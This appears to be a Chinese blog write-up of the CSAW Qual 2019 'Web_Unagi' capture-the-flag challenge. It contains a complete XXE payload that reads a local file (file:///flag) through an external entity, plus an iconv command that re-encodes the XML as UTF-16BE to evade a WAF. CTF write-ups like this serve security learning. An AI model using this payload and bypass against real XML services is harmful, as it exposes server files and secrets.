本文主要是介绍[CSAWQual 2019]Web_Unagi,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
知识点:xxe外部实体注入和绕过waf
告诉我们要传一个xml文件,并且相应的样式信息也出来了。
flag在/flag下
构造xml
<?xml version='1.0'?>
<!DOCTYPE users [
<!ENTITY xxe SYSTEM "file:///flag" >]>
<users><user><username>gg</username><password>passwd1</password><name>ggg</name><email>alice@fakesite.com</email> <group>CSAW2019</group><intro>&xxe;</intro></user><user><username>bob</username><password>passwd2</password><name> Bob</name><email>bob@fakesite.com</email> <group>CSAW2019</group><intro>&xxe;</intro></user>
</users>
但是这边会被waf拦下,我们可以以其他编码方式来编码它。
(注意:这边不是字符串转其他编码,以其他编码格式来编码)
绕过方式
命令:
cat 1.xml | iconv -f UTF-8 -t UTF-16BE > x16.xml
然后上传xml文件就可以了。
参考:
wp:
https://www.shawroot.cc/156.html
文献:
绕过WAF保护的XXE : https://xz.aliyun.com/t/4059
这篇关于[CSAWQual 2019]Web_Unagi的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
